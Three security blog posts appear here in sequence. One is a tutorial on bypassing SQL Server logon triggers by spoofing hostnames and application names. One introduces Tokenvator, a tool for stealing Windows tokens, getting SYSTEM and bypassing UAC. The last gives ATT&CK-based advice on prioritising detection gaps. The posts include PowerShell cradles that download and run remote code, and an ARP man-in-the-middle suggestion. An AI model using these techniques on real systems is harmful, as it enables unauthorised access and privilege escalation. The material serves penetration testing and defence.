It’s pretty common for us to perform application penetration testing against two-tier desktop applications that connect directly to SQL Server databases. Occasionally we come across a SQL Server backend that only allows connections from a predefined list of hostnames or applications. Usually those types of restrictions are enforced through logon triggers. In this blog I’ll show how to bypass those restrictions by spoofing hostnames and application names using lesser known connection string properties. The examples will include SSMS and PowerUpSQL. This should be useful to application penetration testers and developers who may have inherited a legacy desktop application.
This blog has been organized into the sections below; feel free to jump ahead.
A logon trigger is essentially a stored procedure that executes after successfully authenticating to SQL Server, but before the logon session is fully established. They are commonly used to programmatically restrict access to SQL Server based on time of day, hostnames, application names, and number of concurrent sessions by a single user.
Installing SQL Server
If you don’t already have SQL Server installed and want to follow along, below are a few resources to get you started.
Download and install SQL Server Management Studio Express (SSMS) from here.
Creating a Logon Trigger to Restrict Hostnames
Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting workstation name.
Log into your new SQL Server instance as a sysadmin using SSMS.
First, let’s take a look at the name of the workstation connecting to the SQL Server instance using the command below. By default, it should use the hostname of the workstation connecting to the SQL Server instance.
SELECT HOST_NAME()
Create a logon trigger that only allows white listed hostnames to connect. Execute the trigger exactly as it is shown below.
-- Create our logon trigger
CREATE TRIGGER MyHostsOnly
ON ALL SERVER
FOR LOGON
AS
BEGIN
    IF
    (
        -- The white list of allowed hostnames is defined here.
        HOST_NAME() NOT IN ('ProdBox','QaBox','DevBox','UserBox')
    )
    BEGIN
        RAISERROR('You are not allowed to login from this hostname.', 16, 1);
        ROLLBACK;
    END
END
After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from a hostname that is not on the white list.
Spoofing Hostnames using SSMS
At this point, you might ask, “when would I (an attacker) actually use this in the real world?”. Usually it’s after you’ve recovered connection strings from configuration files or decompiled code and want to use that information to connect directly to the backend SQL Server. This is a very common scenario during application penetration tests, but we also find internal applications and configuration files on open file shares during network pentests and red team engagements.
Alright, let’s spoof our hostname in SSMS.
Open the “Connect Object Explorer” in SSMS and navigate to options -> “Additional Connection Parameters”. From there you can set connection string properties on the fly (super cool). For the sake of this example, we’ll set the “Workstation ID” property to “DevBox”, which is a hostname we know is white listed. Note: I’ll cover a few ways to identify white listed hostnames later.
Press connect to login. If you open a query window and check your hostname again it should return “DevBox”. This helps further illustrate that we successfully spoofed the hostname.
SELECT HOST_NAME()
Spoofing Hostnames using Connection Strings
Under the hood, SSMS is just building a connection string with our “workstation id” property set. Below is an example of a simple connection string that will connect to a remote SQL Server instance as the current Windows user and select the “Master” database.
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;
If the logon trigger we showed in the last section was implemented, we should see the “failed to connect” message. However, if you set the “Workstation ID” property to an allowed hostname you would be allowed to log in.
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;Workstation ID = DevBox;
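The same spoofed property can be set programmatically. Below is a minimal PowerShell sketch that uses .NET’s System.Data.SqlClient directly; “serverinstance1” and “DevBox” are the placeholder values from the examples above, so substitute your own.

```powershell
# Connect with a spoofed hostname by setting the "Workstation ID" property
$connString = "Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;Workstation ID=DevBox;"
$conn = New-Object System.Data.SqlClient.SqlConnection($connString)
$conn.Open()

# Ask the server what workstation name it sees for this session
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT HOST_NAME()"
$cmd.ExecuteScalar()   # returns DevBox, confirming the spoofed workstation name
$conn.Close()
```

The workstation name is simply a client-supplied value in the login packet, which is why nothing on the client machine actually has to change.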
Spoofing Hostnames using PowerUpSQL
I’ve also added the “WorkstationId” option to the Get-SQLQuery function of PowerUpSQL. I will be working toward retrofitting the other functions once I find some more time. For now, below is an example showing how to bypass the logon trigger we created in the previous section.
Open PowerShell and load PowerUpSQL via your preferred method. The example below shows how to load it directly from GitHub.
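For reference, the standard download cradle for loading PowerUpSQL from GitHub looks like the following (this assumes outbound HTTPS access from your test box):

```powershell
# Download PowerUpSQL from GitHub and load it into the current PowerShell session
IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
```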
To remove the trigger you can issue the command below.
Get-SQLQuery -Verbose -Instance "MSSQLSRV04\SQLSERVER2014" -WorkstationId "DevBox" -Query 'DROP TRIGGER MyHostsOnly on all server'
Creating a Logon Trigger to Restrict Applications
Below are instructions for setting up a trigger in your home lab that restricts access based on the connecting application name.
Log into your new SQL Server instance as a sysadmin using SSMS.
First, let’s take a look at the name of the application connecting to the SQL Server instance using the command below. It should return “Microsoft SQL Server Management Studio – Query”.
SELECT APP_NAME()
Create a logon trigger that only allows white listed applications to connect. Execute the trigger exactly as it is shown below.
CREATE TRIGGER MyAppsOnly
ON ALL SERVER
FOR LOGON
AS
BEGIN
    IF
    (
        -- Set the white list of application names here
        APP_NAME() NOT IN ('Application1','Application2','SuperApp3000','LegacyApp','DevApp1')
    )
    BEGIN
        RAISERROR('You are not allowed to login from this application name.', 16, 1);
        ROLLBACK;
    END
END
After setting up the logon trigger you should get an error like the one below when you attempt to login with SSMS again, because you are connecting from an application that is not on the white list.
Spoofing Application Names using SSMS
Once again, you might ask, “when would I actually use this in the real world?”. Some applications have their name statically set in the connection string used to connect to the SQL Server. Similar to hostnames, we find them in configuration files and source code. It’s actually pretty rare to see a logon trigger restrict access by application name, but we have seen it a few times.
Alright, let’s spoof our appname in SSMS.
Open the “Connect Object Explorer” in SSMS and navigate to options -> “Additional Connection Parameters”. From there you can set connection string properties on the fly (super cool). For the sake of this example, we’ll set the “application name” property to “SuperApp3000”, which is an application name we know is white listed. Note: I’ll cover a few ways to identify white listed application names later.
Press connect to login. If you open a query window and check your application name again it should return “SuperApp3000”. This helps further illustrate that we successfully spoofed the application name.
SELECT APP_NAME()
Spoofing Application Names using Connection Strings
As I mentioned in the last section, there is a connection string property named “AppName” that can be used by applications to declare their application name to the SQL Server. Below are a few examples of accepted formats.

Application Name:
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;Application Name=MyApp;

ApplicationName:
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;ApplicationName=MyApp;

AppName:
Data Source=serverinstance1;Initial Catalog=Master;Integrated Security=True;AppName=MyApp;
Spoofing Application Names using PowerUpSQL
To help illustrate the application name spoofing scenario, I’ve updated the Get-SQLQuery function of PowerUpSQL to include the “appname” option. I will be working toward retrofitting the other functions once I find some more time. Below is a basic example for now.
Open PowerShell and load PowerUpSQL via your preferred method. The example below shows how to load it directly from GitHub.
PowerUpSQL functions wrap .NET SQL Server functions. When connecting to SQL Server programmatically with .NET, the “appname” property is set to “.Net SqlClient Data Provider” by default. However, since we created a new logon trigger that restricts access by “appname” we should get the following error.
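Setting the “appname” option overrides that default and gets past the trigger. Below is a sketch mirroring the hostname bypass shown earlier; the instance name is the same placeholder used in that example.

```powershell
# Verify the spoofed application name is what the server sees
Get-SQLQuery -Verbose -Instance "MSSQLSRV04\SQLSERVER2014" -AppName "SuperApp3000" -Query "SELECT APP_NAME()"

# Remove the MyAppsOnly logon trigger created earlier
Get-SQLQuery -Verbose -Instance "MSSQLSRV04\SQLSERVER2014" -AppName "SuperApp3000" -Query 'DROP TRIGGER MyAppsOnly on all server'
```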
Finding White Listed Hostnames and Application Names
If you’re not sure what hostnames and applications are in the logon trigger’s white list, below are a few options for blindly discovering them.
Review the Logon Trigger Source Code
The best way to get a complete list of the hostnames and applications white listed by a logon trigger is to review the source code. However, in most cases this requires privileged access.
SELECT name,
OBJECT_DEFINITION(OBJECT_ID) as trigger_definition,
parent_class_desc,
create_date,
modify_date,
is_ms_shipped,
is_disabled
FROM sys.server_triggers
ORDER BY name ASC
Review Application Code for Hardcoded Values
Sometimes the allowed hostnames and applications are hardcoded into the application. If you are dealing with a .NET or Java application, you can decompile it and review the source code for keywords related to the connection string it uses. This approach assumes that you have access to the application assemblies or configuration files. JD-GUI and dnSpy can come in handy.
Review Application Traffic
Sometimes the allowed hostnames and applications are grabbed from the database server when the application starts. As a result, you can use your favorite sniffer to grab the list. I’ve experienced this a few times. You may ask, why would anyone do this? The world may never know.
Use a List of Domain Systems
If you already have a domain account, you can query Active Directory for a list of domain computers. You can then iterate through the list until you come across one that allows connections. This assumes that the current domain user has the privileges to login to SQL Server and the white listed hostnames are associated with the domain.
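A quick way to script that iteration is to pull computer names with ADSI and feed each one to Get-SQLQuery as the workstation ID. This is a rough sketch; it assumes PowerUpSQL is loaded and that failed logins simply return nothing.

```powershell
# Pull computer names from the current domain via ADSI
$computers = ([adsisearcher]"(objectCategory=computer)").FindAll() |
    ForEach-Object { $_.Properties["name"][0] }

# Try each computer name as a spoofed hostname until one is allowed to connect
foreach ($name in $computers) {
    $result = Get-SQLQuery -Instance "MSSQLSRV04\SQLSERVER2014" -WorkstationId $name -Query "SELECT HOST_NAME() as SpoofedName"
    if ($result) {
        "White listed hostname found: $name"
        break
    }
}
```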
Use MITM to Inventory Connections
You can also perform a standard ARP based man-in-the-middle (MITM) attack to intercept connections to the SQL Server from remote systems. If the connection is encrypted (default since SQL Server 2014) you won’t see the traffic, but you’ll still be able to see which hosts are connecting. Naturally other MITM techniques could be used as well.
Warning: If certificate validation is being performed, this could result in dropped packets and impact a production system, so please use this approach with caution.
General Recommendations
Don’t use logon triggers to restrict access to SQL Server based on information that can be easily changed by the client.
If you wish to restrict access to an allowed list of systems, consider using network or host level firewall rules instead of logon triggers.
Consider limiting access to the SQL Server based on user groups and assigned permissions instead of using logon triggers.
Wrap Up
In this blog I covered a few ways to leverage lesser known connection string properties to bypass access restrictions being enforced by SQL Server logon triggers. Hopefully this will be useful if you have to perform a penetration test of a legacy desktop application down the line. If nothing else, hopefully the blog highlighted a few things to avoid when building two-tiered desktop applications. For those who are interested, I’ve also updated the “SQL Server Connection String Cheatsheet” here.
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
WheresMyImplant is a mini red team toolkit that I have been developing over the past year in .NET. While developing and using it, I found that I consistently needed to alter my process access token to do things like obtain SYSTEM permissions or add debug privileges to my process. The library I used for this expanded to the point where it was as useful as an independent toolkit. That is why I created Tokenvator, a simple tool written in .NET that can be used to elevate to the appropriate permissions on Windows. It works by impersonating or altering authentication tokens in processes that the executing process has the appropriate level of permissions over.
Tokenvator can be run in an interactive prompt, or commands can be provided as command line arguments. In the interactive mode, base commands will tab complete, with double tabs providing context specific help.
While most of the screenshots will show commands running from an interactive (Tokens) > prompt, it is possible to run all commands as an argument.
Steal_Token
At its most basic level, Tokenvator is used to access and manipulate Windows authentication tokens. To appropriate the token of another process, we can run the Steal_Token command with the target process’s PID.
We can also optionally add a command to be run that will be launched with the new access token.
(Tokens) > Steal_Token 7384 powershell.exe
[*] Adjusting Token Privilege
[+] Received luid
[*] AdjustTokenPrivilege
[+] Adjusted Token to: SeDebugPrivilege
[+] Recieved Handle for: (7384)
[+] Process Handle: 860
[+] Primary Token Handle: 864
[+] Duplicate Token Handle: 860
[*] CreateProcessWithTokenW
[+] Created process: 14524
[+] Created thread: 18784
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\WINDOWS\system32> whoami
lab\backup
PS C:\WINDOWS\system32> $pid
14524
GetSystem
The most common token I need to steal is for the NT AUTHORITY\SYSTEM account. The GetSystem command was created as a wrapper for Steal_Token to automatically find and access SYSTEM tokens. It works with the same syntax as Steal_Token. Note: This needs to be run from an elevated context.
(Tokens) > GetSystem
[*] Adjusting Token Privilege
[+] Received luid
[*] AdjustTokenPrivilege
[+] Adjusted Token to: SeDebugPrivilege
[*] Searching for NT AUTHORITY\SYSTEM
[*] Examining 344 processes
[*] Discovered 118 processes
[*] Impersonating 5488
[+] Recieved Handle for: (5488)
[+] Process Handle: 888
[*] Impersonating 4444
[+] Recieved Handle for: (4444)
[+] Process Handle: 868
[+] Primary Token Handle: 904
[+] Duplicate Token Handle: 868
(Tokens) > WhoAmI
[*] Operating as NT AUTHORITY\SYSTEM
(Tokens) > RevertToSelf
[*] Reverted token to lab\badjuju
I’ve discovered that I am unable to directly access the token of certain processes unless I’ve first elevated to SYSTEM. Examples of these are the NT SERVICE accounts, such as a local SQL Server service process. This might be necessary if the local SYSTEM account doesn’t have SYSADMIN privileges on the database. Scott Sutherland talks more about this in this blog.
GetTrustedInstaller
It is common for the files in the SYSTEM32 folder or parts of the registry to be owned by the TRUSTEDINSTALLER group. To manipulate the contents of these locations, we can either take ownership or get an access token that has membership in the TRUSTEDINSTALLER group. Similar to GetSystem, GetTrustedInstaller is a wrapper for Steal_Token that starts the TrustedInstaller service and appropriates its token.
List_Privileges and Set_Privilege
Sometimes our process doesn’t have the particular access right that we need in order to complete a task. For instance, to access a process that your current user doesn’t own, the SeDebugPrivilege is required. Shown below is a split token in a high integrity process (UAC Elevated – TokenElevationTypeFull).
And here we can see the default privileges assigned to a split token in a medium integrity process (UAC Not Elevated – TokenElevationTypeLimited).
For this functionality, we are not limited to just our own process. Let’s examine what notepad.exe’s token looks like when run as administrator. Note: To access a process not owned by your current user, the SeDebugPrivilege must be enabled on your current process.
Having examined notepad.exe’s token, we can remotely alter the privileges on it. Let’s add SeLoadDriverPrivilege to that token and see what happens. Note: Privilege names are case sensitive.
Sure enough, notepad.exe can now load a driver, for whatever interesting use cases might require that. In the future, the ability to remove privileges will be added.
BypassUAC
UAC bypasses have become plentiful at this point; however, one of the more interesting ones comes from manipulating tokens. FuzzySecurity has done some very interesting work on a UAC bypass method utilizing Windows tokens. Tokenvator includes an implementation of the technique he published. Below, our unprivileged token can be used to access an elevated process our current user owns and spawn an elevated shell.
While this method likely will not be patched in the near future, it is not without its limitations. As can be seen below, while the process is high integrity, the privileges assigned to the token are still limited.
Finding User Processes
There are multiple methods for identifying a user on a system. First, we can look at the registered sessions on the system.
One feature that I’ve wanted is the ability to have a summary view of user processes to get a sample of users and a process that they own. This is what the List_Processes command accomplishes.
(Tokens) > List_Processes
User Process ID Process Name
---- ---------- ------------
lab\badjuju 4000 conhost
List_Processes takes advantage of the native APIs on the host and is quite fast at listing a summary of processes and owners. As of now, it will not function properly unless run from an elevated context. Because of this, List_Processes_WMI has been included. As the name implies, this operates via WMI. While not as quick as List_Processes, it can provide a more thorough view from a non-elevated context.
(Tokens) > List_Processes_WMI
[*] Examining 102 processes
User Process ID Process Name
---- ---------- ------------
0 Idle
LAB\BADJUJU 448 taskhost
LOCAL\XBADJUJU 1568 cmd
Or we can poll the system for all processes running under the context of a particular user. Note: as of the initial release, the full username is required.
Similar to List_Processes, a mechanism to accomplish the same task has been included via WMI. This will also work in an unelevated context.
(Tokens) > Find_User_Processes_WMI LOCAL\xBADJUJU
[*] Examining 102 processes
[*] Discovered 31 processes
Process ID Process Name
---------- ------------
1568 cmd.exe
2108 conhost.exe
1936 procexp64.exe
3544 cmd.exe
3608 conhost.exe
3892 x64dbg.exe
I made this program for myself and the NetSPI team, but hopefully it will be useful to others. If you have any bugs, commits, or feature requests let me know. All are welcome.
As Adversarial Simulation continues to gain momentum, more companies are performing full evaluations of their technical detective control capabilities using tools like the Mitre ATT&CK Framework. While this is a great way for internal security teams to start developing a detective control baseline, even mature organizations find themselves with dozens of detective capability gaps to follow up on. So, the natural question we hear from clients is “What is the best way to prioritize and streamline our remediation efforts?”. In this blog I’ll provide a few tips based on my experiences.
Before I go down that road, I wanted to take a moment to touch on how I’m qualifying adversarial simulation in this context. Feel free to SKIP AHEAD to the actual tips.
Adversarial Simulation
To better answer the questions, “What are attackers doing?” and “What should we be looking for?”, internal security teams started to document what techniques were being used by malware, red teams, and penetration testers at each phase of the Cyber Kill Chain. This inventory of techniques could then be used to baseline detection capabilities. As time went on, projects like the Mitre ATT&CK Framework started to gain more favor with both the red and the blue teams.
Out of this shared adoption of an established and public framework, Adversarial Simulation began to grow in popularity. Similar to the term “red team”, “Adversarial Simulation” can mean different things to different people. In this context, I’m defining it as “measuring the effectiveness of existing technical detective controls using a predefined collection of security unit tests”. The goal of this type of testing is to measure the company’s ability to identify known Tools, Techniques, and Procedures (TTPs) related to the behavior of attackers that have already obtained access to the environment, in an effort to build and maintain a detective control baseline.
After conducting multiple Adversarial Simulation exercises with small, medium, and large organizations, one thing became very apparent. If your company hasn’t performed adversarial simulation testing before, then you’re likely to have quite a few gaps at each phase of the cyber kill chain. At first this can seem overwhelming, but it is something that you can triage, prioritize, and manage.
The rest of this blog covers some triage options for those companies going through that now.
Using MITRE ATT&CK as a Measuring Stick
The MITRE ATT&CK framework defines categories and techniques that focus on post-exploitation behavior. Since the goal is to detect that type of behavior, it offers a nice starting point.
Source: https://attack.mitre.org/
While this is a good place to start measuring your detective and preventative controls, it’s just a starting point. ATT&CK doesn’t cover a lot of technologies commonly found in enterprise environments, and not all the techniques covered will be applicable to your environment.
Many of the internal security teams we work with have started adopting the ATT&CK framework to some degree. The most common process we see them using has been outlined below:
Start with the entire framework
Remove techniques that are not applicable to your environment
Add techniques that are specific to technologies in your environment
Add techniques that are not covered, but are well known
Work through one category at a time
Test one technique at a time
Assess the SOC team’s ability to detect the technique
Identify artifacts, identify data sources used for TTP discovery, and create SIEM rules
Document technique coverage
Rinse, lather, and repeat.
While there are some commercial products and services available to support this process we have also seen some great open source projects. The Threat Hunter Playbook created by Roberto Rodriguez is at the top of my recommended reading list. It includes lots of useful tools to help internal teams get rolling. You can find it on github: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
When we work with clients, we typically measure the applicable techniques in all phases to provide insight into their ability to detect them within each of the post-exploitation attack phases defined in the ATT&CK framework. However, sometimes that can be information overload, so starting with a few key categories of techniques can be a nice way to kick things off. Clients usually prefer to prioritize around execution, defense evasion, and exfiltration, because they essentially represent the beginning and end of a basic attack workflow. Also, when evaluating exfiltration techniques, you implicitly cover some of the more common control channels.
Below is a sample of the summary data that can shake loose when looking at the whole picture.
At first glance this can seem alarming, but the sky is not falling. Keep in mind that the technologies and processes to identify the TTPs for post exploitation are still trying to catch up to attackers. The first step to getting better is being honest about what you can and can’t do. That way you’ll have the information you need to create a prioritized roadmap that can give you more coverage in a shorter period of time for less money (hopefully).
Remediation Prioritization Tips
The goal of these tips is to reduce the time/dollar investment required to improve the effectiveness of the current controls and your overall ability to detect known and potential TTPs. To start us off I wanted to note that you can’t alert on the information you don’t have. As a result, missing data sources often map directly to missing alerts in specific categories.
Prioritizing Data Sources
As I mentioned before, data sources are what fuel your detective capabilities. When choosing to build out a new data source or detective capability, consider prioritizing around those that have the potential to cover the highest number of techniques across all ATT&CK framework categories.
For example, netflow data can be used to identify:
Generic scanning activity
Authenticated scanning
ICMP and DNS tunnels
Large file downloads and uploads
Long login sessions
Reverse shell patterns
Failed egress attempts
I’m sure there are more use cases, but you get the idea. Naturally, you should inventory and track your known data sources and be conscious of what your data source gaps are. One way to help make sure that gap list is fleshed out is to identify potential data sources based on what techniques don’t generate any alerts.
Below is a basic pie chart showing how that type of data can be represented. It summarizes the level of visibility for techniques that did not generate a security alert. The identified detection gaps fall into one of five detection levels: Unknown, Undetected, Partially Logged, Logged, and Partially Detected.
Existing Data Sources
From this we can see that 60% of the techniques that didn’t generate an alert still left traces in logs. By pulling in that log data we can almost immediately start working on correlations and alerts for many of the associated attack techniques. That by itself should have some influence on what you start with when building out new detections.
Missing Data Sources
The other 40% represent missing or misconfigured data sources. Using the list of associated techniques and information from Mitre we can determine potential data sources, and which ones would provide coverage for the largest number of techniques. If you’re not sure what data sources are associated with which techniques, you can find it on Mitre website. Below is an example that illustrates some of the information available for the Accessibility Features in Windows.
Below is a sample PowerShell script that uses Invoke-ATTACKAPI to get a list of the data sources that can be used to identify multiple attack techniques. To increase its usefulness, you could easily modify it to only include the attack techniques that you know you’re blind to. Note: All of your data sources may not be covered by the framework, or the framework may use different language to describe them.
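A sketch of that script might look like the following. Note that the DataSource property name is an assumption on my part, so adjust it to match the schema Invoke-ATTACKAPI actually returns.

```powershell
# Load Invoke-ATTACKAPI from GitHub and sync the ATT&CK content
iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Count how many techniques each data source can help identify
# Note: the DataSource property name is assumed; check the synced object schema
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" |
    ForEach-Object { $_.DataSource } |
    Group-Object | Sort-Object Count -Descending
```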
From the command results, you can quickly see that “Process Monitoring” and a few others can be incredibly powerful data sources for detecting the techniques in the MITRE ATT&CK Framework.
Prioritizing Techniques by Tactic
Command execution and defense evasion techniques occur at the beginning of, and throughout, the kill chain. As such, having deeper visibility into these techniques can help mitigate the risk associated with some of the visibility gaps in later attack phases, such as persistence, lateral movement, and credential gathering, by detecting potentially malicious behavior sooner.
Below I reorganized the ATT&CK categories from our previous example test results to illustrate the point.
Command Execution
Attackers often employ non-standard command execution techniques that leverage native applications to avoid application white list controls. Many of those techniques are not commonly used by legitimate users, so the commands themselves can be used as reliable indicators of malicious behavior.
For example, most users don’t use regsvr32.exe, regsvcs.exe, or msbuild.exe at all. When they are used legitimately, it’s rare that they use the same command options as attackers. For some practical examples check out the atomic-red-team repo on github: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/windows-index.md
Defense Evasion
Similar to command execution, attackers often employ defense evasion techniques that do not represent common user behavior. As a result, they can be used as reliable indicators of malicious behavior.
Lateral Movement
Not every attacker performs scanning, but a lot of them do. If you can accurately identify generic scanning and authenticated scanning behavior through netflow data and Windows authentication logs you have a pretty good chance of detecting them. If you have the data sources, but alerts aren’t configured, it’s worth the effort to close the gap. Sean Metcalf shared a presentation that covers some information on the topic (among other things) that can be found here.
Ideally it will help you identify potentially malicious movement before the attackers reach their target and start exfiltration.
Exfiltration
If you missed the attacker executing commands on the endpoints, looking for common malicious behaviors and anomalies in outbound traffic and internet-facing systems can yield some valuable results (assuming you have the right data sources). Most people are familiar with the common control channels, but for those who are not, below is a short list:
ICMP, SMTP, SSH, and DNS tunnels
TCP/UDP reverse shells (over various ports/protocols)
TCP/UDP beacons (over various ports/protocols)
Web shells
Prioritizing Techniques by Utility
Developing detections for techniques that are used in multiple attack phases can give you a better return on your time/dollar investments. For example, scheduled tasks can be used for execution, persistence, privilege escalation, and lateral movement. So, when you have the ability to identify high risk tasks that are being created, you can kill three birds with one stone. (Note: No birds were actually killed in the making of this blog.)
Below is a sample PowerShell script that uses Invoke-ATTACKAPI to get a list of the techniques used in multiple attack categories. To increase its usefulness, you could easily modify it to only include the attack techniques that you’re blind to.
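A sketch of that script might look like the following. Note that the Tactic property name is an assumption on my part, so adjust it to match the schema Invoke-ATTACKAPI actually returns.

```powershell
# Load Invoke-ATTACKAPI from GitHub and sync the ATT&CK content
iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Count how many attack categories (tactics) each technique shows up in
# Note: the Tactic property name is assumed; check the synced object schema
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" |
    Select-Object Tactic, TechniqueName -Unique |
    Group-Object TechniqueName | Sort-Object Count -Descending
```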
Once again you can see that some of the techniques can be used in more phases than others.
Prioritizing Techniques by (APT) Group
The ATT&CK framework also includes information related to well-known APT groups and campaigns at https://attack.mitre.org/wiki/Groups. The groups are linked to techniques that were used during campaigns. As a result, we can see which techniques are used by the largest number of (APT) groups using the Invoke-ATTACKAPI PowerShell script below.
# Load script from GitHub and sync
iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Cyb3rWard0g/Invoke-ATTACKAPI/master/Invoke-ATTACKAPI.ps1")

# Techniques used by the largest number of APT groups
$AllTechniques = Invoke-ATTACKAPI -All
$AllTechniques | Where-Object platform -like "Windows" | Select-Object Group, TechniqueName -Unique |
    Where-Object Group -notlike "" | Group-Object TechniqueName | Sort-Object Count -Descending
To make it more useful, filter for group names that are more relevant to your industry. At the moment I don’t think the industries or countries targeted by the groups are available as metadata in the ATT&CK framework, so for now that part may be a manual process. Either way, big thanks to Jimi for the tip!
Prioritizing Based on Internal Policies and Requirements
Understanding your company’s priorities and policies should always influence your choices. However, if you are going to follow those policies, make sure that the language is well defined and understood. For example, if you have an internal policy that states you must be able to detect all known threats, then “known threats” needs to be defined and expectations should be set as to how the list of known threats will be maintained.
Like vulnerability severity ranking, you should also create a system for ranking detective control gaps. That system should also define how quickly the company will be required to develop a detective capability either through existing controls, new controls, or process improvements.
Bridging the Gap with Regular Hunting Exercises
Regardless of how you prioritize the development of your detective capabilities, things take time. Collecting new data sources, improving logging, improving SIEM data ingestion/rules for all of your gaps is rarely a quick process. While you’re building out that automation consider keeping an eye on known gaps via regular hunting exercises. We’ve seen a number of clients leverage well defined hunts to yield pretty solid results. There was a nice presentation by Jared Atkinson and a recent paper by Paul Ewing/Devon Kerr from Endgame that are worth checking out if you need a jump start.
Wrap Up
Just like preventative controls, there is no such thing as 100% threat detection. Tools, techniques, and procedures are constantly changing and evolving. Do the best you can with what you have. You’ll have to make choices based on perceived risks and the ROI of your security control investments in the context of your company, but hopefully this blog will help make some of those choices easier. At the end of the day, all of my recommendations and observations are limited to my experiences and the companies I’ve worked with in the past. So please understand that while I’ve worked with quite a few security teams, I still suffer from biases like everyone else. If you have other thoughts or recommendations, I would love to hear them. Feel free to reach out in the comments. Thanks and good luck!